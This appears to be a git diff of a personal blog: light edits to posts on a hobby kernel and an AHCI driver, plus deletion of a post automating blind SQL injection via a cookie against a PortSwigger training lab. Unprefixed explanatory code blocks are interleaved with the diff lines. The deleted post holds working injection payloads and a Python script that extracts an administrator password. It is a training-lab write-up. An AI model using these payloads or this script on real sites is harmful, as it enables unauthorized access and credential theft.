3 changed files with 17 additions and 243 deletions
--- a/content/blog/2023/12/acadia-0.1.0/index.md
+++ b/content/blog/2023/12/acadia-0.1.0/index.md
@@ -111,14 +111,13 @@ On top of the things mentioned above, we use the limine protocol to:
 Following boot we immediately initialize the global descriptor table (GDT) and
 interrupt descriptor table (IDT). The **GDT** is mostly irrelevant for x86-64,
 however it was interesting trying to get it to work with the sysret function
-which expects two copies of the user-space segment descriptors to allow
+which expects two copies of the user-space segment descriptors to allow returning
-returning to 32bit code from a 64 bit OS. Right now the system doesn't support
+to 32bit code from a 64 bit OS. Right now the system doesn't support 32 bit code
-32 bit code (and likely never will) so we just duplicate the 64 bit code
+(and likely never will) so we just duplicate the 64 bit code segment.
-segment.
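As a rough illustration of why `sysret` wants that layout: on x86-64 the instruction derives the user selectors from a single base value stored in bits 63:48 of the STAR MSR. The 32-bit code selector is the base itself, the stack selector is base + 8, and the 64-bit code selector is base + 16. The sketch below only does that arithmetic; the base value `0x18` and the function name are assumptions for illustration, not values taken from the Acadia source.

```python
RPL_USER = 3  # requested privilege level for ring 3


def sysret_selectors(star_user_base):
    """Selectors SYSRET derives from STAR[63:48] (star_user_base is hypothetical)."""
    return {
        "cs_32bit": star_user_base | RPL_USER,         # used when returning to 32-bit code
        "ss": (star_user_base + 8) | RPL_USER,         # user data/stack segment
        "cs_64bit": (star_user_base + 16) | RPL_USER,  # used when returning to 64-bit code
    }


selectors = sysret_selectors(0x18)
for name, value in selectors.items():
    print(f"{name}: {value:#04x}")
```

Since the 32-bit slot is never used here, filling it with a copy of the 64-bit code descriptor keeps the three entries contiguous without defining a real 32-bit segment.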
 The **IDT** is fairly straightforward and barebones for now. I slowly add more
 debugging information to faults as I run into them and it is useful. One of the
-biggest improvements was setting up a separate kernel stack for Page Faults and
+biggest improvements was setting up a separate kernel stack for Page Faults and
 General Protection Faults. That way if I broke memory related to the current
 stack frame I get useful debugging information rather than an immediate triple
 fault. I also recently added some very sloppy stack unwind code so I can more
@@ -154,9 +153,9 @@ earlier than they need to be it is obvious because things break.
 For **virtual memory management** I keep the higher half (kernel) mappings
 identical in each address space. Most of the kernel mappings are already
-available from the bootloader but some are added for heaps and additional stacks.
+available from the bootloader but some are added for heaps and additional stacks.
 For user memory we maintain a tree of the mapped in objects to ensure that none
-intersect. Right now the tree is inefficient because it doesn't self balance
+intersect. Right now the tree is inefficient because it doesn't self balance
 and most objects are inserted in ascending order (i.e. it is essentially a
 linked list).
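The non-intersection check can be sketched independently of the tree. The example below is not the kernel's data structure: it swaps the tree for a sorted Python list plus the standard `bisect` module, and the class and method names are made up for illustration. The point is that only the two neighbours of the insertion point need to be examined.

```python
import bisect


class MappingSet:
    """Hypothetical stand-in for the kernel's tree of mapped objects."""

    def __init__(self):
        self._starts = []   # sorted start addresses, parallel to _regions
        self._regions = []  # (start, end) pairs, half-open, sorted by start

    def insert(self, start, size):
        """Insert [start, start + size); return False if it would overlap."""
        end = start + size
        i = bisect.bisect_left(self._starts, start)
        # The region just before must end at or before our start.
        if i > 0 and self._regions[i - 1][1] > start:
            return False
        # The region at or after must begin at or after our end.
        if i < len(self._regions) and self._regions[i][0] < end:
            return False
        self._starts.insert(i, start)
        self._regions.insert(i, (start, end))
        return True


mappings = MappingSet()
print(mappings.insert(0x1000, 0x1000))  # first mapping
print(mappings.insert(0x1800, 0x1000))  # overlaps the first one
```

A sorted list has O(n) insertion, so it shares the weakness described above; a self-balancing tree would keep the same neighbour check while making insertion logarithmic.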
@@ -214,7 +213,7 @@ The kernel provides APIs to:
 * Allocate memory and map it into an address space.
 * Communicate with other processes using Endpoints, Ports, and Channels.
 * Register IRQ handlers.
-* Manage Capabilities.
+* Manage Capabilities.
 * Print debug information to the VM output.
 ### IPC
--- a/content/blog/2024/01/ahci-driver/index.md
+++ b/content/blog/2024/01/ahci-driver/index.md
@@ -110,7 +110,7 @@ The short story is that we are looking for the device with the right [class
 code](https://wiki.osdev.org/PCI#Class_Codes) - Class Code 0x1 (Storage Device),
 Subclass 0x6 (SATA Controller), Subtype 0x1 (AHCI).
-Once we have the correct configuration space we can read the address at offset
+Once we have the correct configuration space we can read the address at offset
 0x24 (called the ABAR for AHCI Base Address) which points to the start of the
 GHC registers.
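To make the offsets concrete, here is a small Python sketch that decodes those fields from a raw copy of a device's PCI configuration space. It assumes the standard PCI header layout (programming interface, subclass, and class code in the bytes at 0x09 to 0x0B, and BAR5 at 0x24); the function names and the sample buffer are invented for illustration, and the driver itself is not written in Python.

```python
import struct

AHCI_CLASS = (0x01, 0x06, 0x01)  # class, subclass, programming interface


def class_triplet(config):
    """Return (class, subclass, prog_if) from the dword at offset 0x08."""
    _revision, prog_if, subclass, class_code = struct.unpack_from("<BBBB", config, 0x08)
    return (class_code, subclass, prog_if)


def ahci_base_address(config):
    """Return the ABAR (BAR5 at offset 0x24) with the low flag bits masked off."""
    (bar5,) = struct.unpack_from("<I", config, 0x24)
    return bar5 & 0xFFFFFFF0


# Fabricated configuration space for demonstration only.
config = bytearray(64)
config[0x09:0x0C] = bytes([0x01, 0x06, 0x01])
struct.pack_into("<I", config, 0x24, 0xFEBF1000)

if class_triplet(config) == AHCI_CLASS:
    print(hex(ahci_base_address(config)))
```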
@@ -319,7 +319,7 @@ type and any errors from the interrupt since we aren't sending any commands.
 Something I'm not sure about is that as soon as we enable interrupts we seem to
 receive a FIS from the device with an error bit set. Both the hard drive and the
-optical drive on QEMU send a FIS with error bit 0x1 set. Additionally the status
+optical drive on QEMU send a FIS with error bit 0x1 set. Additionally the status
 field is set to 0x30 for the hard drive and 0x70 for the optical drive. 
 I was able to find an [OSDev Forum
@@ -328,7 +328,7 @@ referencing that this behavior is caused by the reset sending an EXECUTE DEVICE
 DIAGNOSTIC command (0x90) to the device. It notes that this is largely
 undocumented behavior but at least this information offers some clarity on the
 outputs. Reading the ATA Command Set section 7.9.4 we can see that the command
-outputs code 0x01 to the error bits when `Device 0 passed, Device 1 passed or not
+outputs code 0x01 to the error bits when `Device 0 passed, Device 1 passed or not
 present`. According to a footnote we can "See the appropriate transport standard
 for the definition of device 0 and device 1." I really thought I was already
 looking at the "appropriate transport standard" but alas. All that to say we'll
@@ -340,7 +340,7 @@ Now that the AHCI ports are initialized and can handle an interrupt, we can send
 commands to them. To start with let's send the IDENTIFY DEVICE command to each
 device. This command asks the device to send 512 bytes of information about
 itself back to us. These bytes contain 40 years of certified-crufty backwards
-compatibility. I mean just feast your eyes on the number of retired and obsolete
+compatibility. I mean just feast your eyes on the number of retired and obsolete
 fields in just the first page of the spec.
 ![IDENTIFY DEVICE Response](images/IDENTIFY_DEVICE.png)
@@ -350,7 +350,7 @@ and sector count from the drive. To do so we need to figure out how to send a
 command to the device. To be honest I feel like the specs fall down here in
 actually explaining this. The trick is to send a Register Host to Device FIS in one
 of the command slots. This FIS type has a field for the command as well as some
-common parameters such as LBA and count. In retrospect it is fairly clear once
+common parameters such as LBA and count. In retrospect it is fairly clear once
 you are aware of it, but if you are just reading the SATA spec and looking at
 the possible commands, making the logical jump to the Register Host To Device
 FIS feels damn near impossible.
@@ -379,7 +379,7 @@ Device FIS is as follows:
 ![Register Host to Device FIS Layout](images/RegisterHostToDeviceFIS.png)    
 We don't need to initialize most of the fields here because the IDENTIFY_DEVICE
-call doesn't rely on an LBA or sector count. One of the keys is setting the high
+call doesn't rely on an LBA or sector count. One of the keys is setting the high
 bit "C" in the byte that contains PM Port which indicates to the HBA that this
 FIS contains a new command (I spent a while trying to figure out why this wasn't
 working without that). The code for this is relatively straightforward.
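The post's own code for this step is not part of this diff, so the following is an independent Python sketch of the byte layout rather than the driver's implementation. It assumes the standard 20-byte Register Host to Device FIS: type 0x27 in byte 0, the "C" bit as bit 7 of byte 1, the command in byte 2, the 48-bit LBA split across bytes 4 to 6 and 8 to 10, and the count in bytes 12 and 13. The function name and defaults are hypothetical.

```python
FIS_TYPE_REG_H2D = 0x27
ATA_CMD_IDENTIFY_DEVICE = 0xEC
COMMAND_BIT = 0x80  # the "C" bit: this FIS carries a new command


def build_h2d_fis(command, lba=0, count=0, device=0):
    """Build a 20-byte Register Host to Device FIS (illustrative helper)."""
    fis = bytearray(20)
    fis[0] = FIS_TYPE_REG_H2D
    fis[1] = COMMAND_BIT              # PM port left at 0, C bit set
    fis[2] = command
    lba_bytes = lba.to_bytes(6, "little")
    fis[4:7] = lba_bytes[0:3]         # LBA bits 0..23
    fis[7] = device
    fis[8:11] = lba_bytes[3:6]        # LBA bits 24..47
    fis[12:14] = count.to_bytes(2, "little")
    return bytes(fis)


identify = build_h2d_fis(ATA_CMD_IDENTIFY_DEVICE)
print(identify.hex(" "))
```

For IDENTIFY DEVICE everything except the first three bytes stays zero, which matches the observation that most fields need no initialization.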
@@ -429,9 +429,9 @@ port_struct_->command_issue |= (1 << slot);
 ```
 But wait! How will we know when this command has completed? We somehow need to
-wait until we receive an interrupt for this command to process the data it
+wait until we receive an interrupt for this command to process the data it
 sent. To handle this we can add a semaphore for each port command slot to allow
-signalling when we receive a completion interrupt for that command. I think it
+signalling when we receive a completion interrupt for that command. I think it
 might make sense to have some sort of callback instead so we can pass errors
 back to the caller instead of just a completion signal. However I'm not sure
 what type of errors exist that are resolvable by the caller so for now this
@@ -469,7 +469,7 @@ void AhciPort::HandleIrq() {
 }
 ```
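The semaphore-per-slot idea can be modelled outside the kernel. The Python sketch below uses `threading.Semaphore` as a stand-in for the kernel's semaphore and assumes that a slot counts as complete once its bit in the port's command issue register has cleared. The class name, method names, and the 32-slot constant are illustrative assumptions, not the driver's API.

```python
import threading

NUM_SLOTS = 32  # assumed number of command slots per port


class PortCompletions:
    """Hypothetical model of one semaphore per command slot."""

    def __init__(self):
        self._sems = [threading.Semaphore(0) for _ in range(NUM_SLOTS)]

    def wait(self, slot, timeout=None):
        """Block until the slot's completion is signalled; False on timeout."""
        return self._sems[slot].acquire(timeout=timeout)

    def handle_irq(self, issued_mask, command_issue):
        """Signal every slot that was issued and is no longer marked busy."""
        done = issued_mask & ~command_issue
        for slot in range(NUM_SLOTS):
            if done & (1 << slot):
                self._sems[slot].release()
        return done


port = PortCompletions()
finished = port.handle_irq(issued_mask=0b101, command_issue=0b100)
print(bin(finished), port.wait(0, timeout=0.1))
```

A callback-based design would replace `release()` with a call that also carries an error value, which is the trade-off weighed in the text.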
-OK now that we have retrieved the information from the drive we can parse it.
+OK, now that we have retrieved the information from the drive we can parse it.
 For the sector size, the default is 512 bytes which we will use unless the
 `LOGICAL SECTOR SIZE SUPPORTED` bit is set in double word 106, bit 12. If that
 is set we can check the double words at 117 and 118 to get the 32 bit sector
@@ -531,7 +531,7 @@ that truly only a mother could love:
 ![Register Host to Device Layout LBA](images/RegisterHostToDeviceFISLBA.png)
-That aside we simply update the FIS construction to set the command, LBA, and
+That aside we simply update the FIS construction to set the command, LBA, and
 sector count. Following that we set the PRDT values (although we still only use
 one slot).
--- a/content/blog/2024/01/blind-sqli-automation/index.md
+++ b/content/blog/2024/01/blind-sqli-automation/index.md
@@ -1,225 +0,0 @@
 ---
 title: "Automating Blind SQL Injection on Cookies"
 date: 2024-01-23
 ---
 Earlier this evening, I was working through one of the [PortSwigger SQL
 injection
 labs](https://portswigger.net/web-security/sql-injection/blind/lab-conditional-responses)
 which requires you to determine an administrator password by injecting some SQL
 into a cookie and checking if the content of the page changes because a
 resulting query succeeded or failed.
 ## The attack
 Basically, say you have a cookie `TrackingId` with a value like
 `nCoQWoq8E7c6vj1o`, and the page runs a query like `SELECT ... FROM trackers
 WHERE id = 'nCoQWoq8E7c6vj1o'`. It inserts a "Welcome Back" banner onto the page
 if the query returns a row and omits the banner if it doesn't.
 This means you can get creative with the value of the cookie to do some SQL
 injection and use the boolean output (either the banner displays or it doesn't)
 to extract information.
 To validate that there is a SQL injection path available you can try the
 following two values for the cookie:
 ```markdown
 nCoQWoq8E7c6vj1o' AND '1'='1
 nCoQWoq8E7c6vj1o' AND '1'='0
 ```
 This transforms the query from something like this:
 ```sql
 SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o';
 ```
 Into your modified query:
 ```sql
 SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND '1'='0';
 ```
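To see the boolean side channel without touching the lab, the behaviour can be reproduced locally. This is a sketch under assumptions: it uses an in-memory SQLite database in place of the lab's real backend, a made-up `trackers` table, and a hypothetical `shows_banner` function that mimics the vulnerable string concatenation.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE trackers (id TEXT, tracker TEXT)")
conn.execute("INSERT INTO trackers VALUES ('nCoQWoq8E7c6vj1o', 'some-tracker')")


def shows_banner(cookie_value):
    """Mimic the vulnerable page: the cookie is pasted straight into the SQL."""
    query = f"SELECT tracker FROM trackers WHERE id = '{cookie_value}'"
    return conn.execute(query).fetchone() is not None


print(shows_banner("nCoQWoq8E7c6vj1o' AND '1'='1"))  # condition true, row returned
print(shows_banner("nCoQWoq8E7c6vj1o' AND '1'='0"))  # condition false, no row
```

The trailing quote is deliberately left off each payload because the query template supplies the closing one.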
 Now this might not seem very useful off the bat but you can extract a lot of
 information out of the database this way. Consider the following query.
 ```sql
 SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND
  (SELECT password FROM users WHERE username = 'administrator') = 'hunter2';
 ```
 Now if the "Welcome Back" banner displayed on the site you would know that you
 had properly guessed the admin password because the condition evaluated to true.
 Now this isn't any more helpful than just trying to brute force the password on
 the login page (other than maybe just bypassing some rate-limits and monitoring).
 But what you can do to speed this up is guess one character at a time,
 and you can bisect the character range while you're at it. Consider the following three queries
 (borrowed directly from the [PortSwigger
 tutorial](https://portswigger.net/web-security/sql-injection/blind)).
 ```sql
 -- This succeeds
 SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
  (SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 'm';
 -- This fails
 SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
  (SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 't';
 -- This succeeds
 SELECT tracker FROM trackers WHERE id = 'nCoQWoq8E7c6vj1o' AND SUBSTRING(
  (SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's';
 ```
 We now know the first letter of the administrator password is 's'!
 Looking directly at the cookie values they were as follows:
 ```markdown
 nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 'm
 nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) >= 't
 nCoQWoq8E7c6vj1o' AND SUBSTRING((SELECT password FROM users WHERE username = 'administrator'), 1, 1) = 's
 ```
 This is a pretty nifty attack that lets us systematically derive the
 administrator's password.
 ## The Problem
 Happily, I got to work on the lab and started bisecting each letter of the
 administrator's password. The issue was that by the time I had done this for 5
 letters of the password I was desperately hoping it was only 5 characters long.
 I had the same thought at 8 characters, 10 characters, and 16 characters. This
 process was incredibly tedious and involved refreshing the page, updating the
 cookie info based on what I had just learned, saving the cookie, and refreshing
 the page again.
 Obviously there had to be a better way, but because I kept feeling like I was
 just around the corner from cracking it I ended up powering through all 20
 characters of the password. 20! This took me well over 30 minutes I think.
 Clearly, this sort of repetitive work is something that should be automated.
 ## The Solution
 So let's take a crack at this using the Python requests library (mainly because
 it is the one I've used in the past). Let's start by simply getting the page as
 is:
 ```python
 import requests
 url = "https://{SOME_HEX_ID}.web-security-academy.net/"
 r = requests.get(url)
 print(r.status_code)
 print(r.text)
 ```
 And voilà, it works! At least we don't have to pretend we're a browser or
 something to get the page properly. Next up let's try to get the "Welcome Back!"
 banner.
 ```python
 cookies = {
    "TrackingId": "CjAZljYSS9X1ZfRg",
 }
 r = requests.get(url, cookies=cookies)
 ```
 Incredibly this also works on the first try! Now let's generalize this into a
 function that tells us whether a specific cookie gets a good response or not.
 ```python
 import sys
 import requests
 def injection_works(inject_str):
     url = "https://0a0400cc04bd096f82089e9e005900a9.web-security-academy.net/"
     cookies = {
         "TrackingId": f"CjAZljYSS9X1ZfRg{inject_str}",
     }
     r = requests.get(url, cookies=cookies)
     if r.status_code != 200:
         # Bail out loudly so a failed request is never mistaken for a "false" answer.
         print(r.status_code)
         print(r.text)
         sys.exit("Request failed")
     # The banner only appears when the injected condition evaluated to true.
     return "Welcome back!" in r.text
 if __name__ == "__main__":
     print(injection_works(""))
 ```
 For the purposes of this we can just match the exact string in the response
 text; we don't need to actually parse it using Beautiful Soup or something.
 Now we can use this function to bisect the first character like so:
 ```python
 import time
 def determine_character(char_num):
     # Parentheses are needed so the two string literals are joined into one.
     base_inj_str = (
         "' AND SUBSTRING("
         "(SELECT password FROM users WHERE username = 'administrator'), {}, 1) < '{}"
     )
     # There has got to be a cleaner way to do this right?
     base_charset = "0123456789abcdefghijklmnopqrstuvwxyz"
     charset = base_charset[:]
     while len(charset) > 1:
         mid_char_num = len(charset) // 2
         mid_char = charset[mid_char_num]
         inj_str = base_inj_str.format(char_num, mid_char)
         if injection_works(inj_str):
             # The character is less than our midpoint.
             charset = charset[:mid_char_num]
         else:
             # The character is greater than or equal to our midpoint.
             charset = charset[mid_char_num:]
         # Be gentle with the lab server between requests.
         time.sleep(1)
         print(charset)
     return charset[0]
 if __name__ == "__main__":
    print(determine_character(1))
 ```
 This successfully identifies the first character in the administrator password as
 '1'.
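One way to sanity-check the bisection logic without sending any requests is to run it against a local oracle. The sketch below is an offline stand-in, not part of the original script: `bisect_character` takes a hypothetical `is_less_than` callback in place of `injection_works`, and the character set is built from the standard `string` module so that no letter can be dropped by accident.

```python
import string

CHARSET = string.digits + string.ascii_lowercase  # sorted in ASCII order


def bisect_character(is_less_than):
    """Narrow CHARSET down to one character using only 'secret < probe' answers."""
    charset = CHARSET
    while len(charset) > 1:
        mid = len(charset) // 2
        if is_less_than(charset[mid]):
            charset = charset[:mid]
        else:
            charset = charset[mid:]
    return charset[0]


def recover(secret):
    """Recover a known secret character by character via the local oracle."""
    return "".join(
        bisect_character(lambda probe, ch=ch: ch < probe) for ch in secret
    )


print(recover("s3cr3tw0rd"))
```

Running every character of the set through the oracle is a cheap test that the candidate list is complete and correctly ordered.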
 Finally we just need to do this iteratively until we reach the end of the
 password. While doing this manually I learned that when you take a substring
 outside of a string's length in MySQL it just returns an empty string. Let's add a
 case to detect that before trying to bisect a character because, as I
 learned annoyingly the first time around, the empty string always compares
 as less than any single character. We can use that to our advantage, however, and
 simply test whether the substring is less than a character we know we won't
 see (as we know the password is lowercase alphanumeric), such as '!'.
 ```python
 def determine_character(char_num):
     base_inj_str = (
         "' AND SUBSTRING("
         "(SELECT password FROM users WHERE username = 'administrator'), {}, 1) < '{}"
     )
     base_charset = "0123456789abcdefghijklmnopqrstuvwxyz"
     # Past the end of the password SUBSTRING yields '', which sorts before '!'.
     if injection_works(base_inj_str.format(char_num, '!')):
         return None
    ...
 ```
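The end-of-password check can be tried locally as well. This sketch uses SQLite's `substr` through the standard `sqlite3` module as a stand-in for the lab's database, so it only illustrates the comparison; other engines and collations may order characters differently. The helper name is made up.

```python
import sqlite3

conn = sqlite3.connect(":memory:")


def char_is_less_than(password, position, probe):
    """Ask SQLite whether the 1-based character at `position` sorts before `probe`."""
    row = conn.execute(
        "SELECT substr(?, ?, 1) < ?", (password, position, probe)
    ).fetchone()
    return bool(row[0])


print(char_is_less_than("abc", 3, "!"))  # last real character
print(char_is_less_than("abc", 4, "!"))  # one past the end
```

Only the out-of-range position compares as less than '!', which is what makes it usable as a terminator test for a lowercase alphanumeric password.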
 Then in the main function we can use an [assignment
 expression](https://peps.python.org/pep-0572/) to loop until the function
 returns None.
 ```python
 if __name__ == "__main__":
    char_num = 1
    password = ""
    while char := determine_character(char_num):
        password += char
        char_num += 1
    print(password)
 ```
 And this worked on the first try! It got the password in around 3 minutes
 (mainly hampered by the slow response time of the server but I didn't want to
 hammer the kind people at PortSwigger by parallelizing this). And all told this
 took me just over 50 minutes to write (including this blog post though). And
 while that was slightly longer than the time it took me to do this manually it
 was wayyyy less tedious and it's repeatable!
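For a rough sense of where the time goes, the request count can be bounded with a little arithmetic. This is a back-of-the-envelope sketch: it assumes one end-of-password check per position (plus the final check that stops the loop) and a worst case of ceil(log2(n)) bisection steps over an n-character set. The function names are made up.

```python
import math


def max_requests(password_length, charset_size):
    """Upper bound on requests: one end check plus bisection steps per character."""
    steps = math.ceil(math.log2(charset_size))
    # The extra 1 is the final end check that terminates the loop.
    return password_length * (1 + steps) + 1


def max_linear_requests(password_length, charset_size):
    """Upper bound when every candidate character is tried in turn."""
    return password_length * charset_size


print(max_requests(20, 36), max_linear_requests(20, 36))
```

With a one-second sleep after each bisection step, the sleeps alone account for up to two minutes of a 20-character run, so a total of around three minutes is plausible once server latency is added.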
 Overall, I found this very enjoyable as I have played with SQL injections in the
 past but I haven't tried to automate anything around it and this was a cool
 opportunity to do that.